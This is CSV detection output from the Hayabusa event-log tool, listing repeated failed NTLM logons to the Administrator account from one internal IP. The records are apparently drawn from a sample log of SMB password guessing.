2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZdNX4ubtpQaV9EeF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S05I0ZlGKGazkVkL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pzbfrYSYhxH6WcCt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZGTvXs8Mlc0Fi7iT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C1LjtTFjPfPlBqAi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1lhJW3iO1xGGTMhp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IMz7WmlBTgadVgN8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OB02epCA5pc5oBeJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KAFgReUMtu9VerRl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ByeL26yQfohpQT3z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 527r3nh9ocmItXfL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HNeC1BBFVXv839Ys  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: juXXpQcoPfJLMQ3L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: njNdv4lGnsUpooCP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j6VchLhWJT7cCWVR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r3xxnFpbd8zkFm0h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jtf156NEpOebQHGC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 17O1jfGX6KQMPgnD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3NaqTqrCiPPfNxZF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Az7cwIWXUGVIMTv5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Djaxf99PVs2VkMy6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rbTSoTdaQ0Y4c9Gw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g9aTo4QBHfrgPYZ2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dpHKjYzZTn0ruIrf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HqhPnV6tc8airRqu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RIOCqtXh5ji12U5q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RwuGZ0kgg1yToLlr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZSBbd4qBRuzeKBjD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8zS1Muxc9gpcqv23  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c6wiIkfkgtso42P1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q1ilRmhSB5RfvpVa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PuQ47GGBraimypWL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UfUsAYWilbwMScpE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 22ZSltGNwIl0DNDM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IYwG9IUpdk5DmM8w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4a8kbGxQFHDBodGF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KoLqIaO8p3k9kOkj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rUnonSx3ZBdkyGhu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d1QJziwKhsaJljGV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZhcNRrpODYB9jZxs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yi5JE53caVn7n54w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Jx6qTASzFp830ud6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b4L8HtBWlmAMTjCf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F4hVfTwibHreepku  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3TlapK211UT8SO0W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mzzw3uPkn2cgtmlF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aPnfUjwJei5E5BD7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mm1k0eeKAYokIbDg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w8TDNcJ3LMyNtUe1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ogKKslkdXvc9f130  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sgoy6gMfe5N0UiP5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lfjf3d6I8TsBOzvc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Vs8DG8s81oOwYoI7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LFkgN1aDoYkQ4qrT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KMwLokYpcFIYHegd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6oKradBV4ERsQnKs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0qPzlzfmgrbYTKqQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qKYlBm2lhobHzbjh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DBMu96oqO9tb3f4O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tO04Q3eYdzyuy51v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FrIa2UrSrfdhkDCx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: axhhyMrGl95O16Vg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: atjvfi8QeEDluhL2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9HPBZKUiiKeyQwSr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2SmitfyjO4mxqw5E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nrq1g8ktTQbPTXqn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 943GV3t1muba5IQT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HPVd28zf85AxdGqd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: D6evoSSxcKkHspuc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C4fznmrnIdUH7DzG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AwrrYjUV41P0K5Jh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z4RBZrALEnH5BKP9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LU6uWH4gs4iHP7rV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
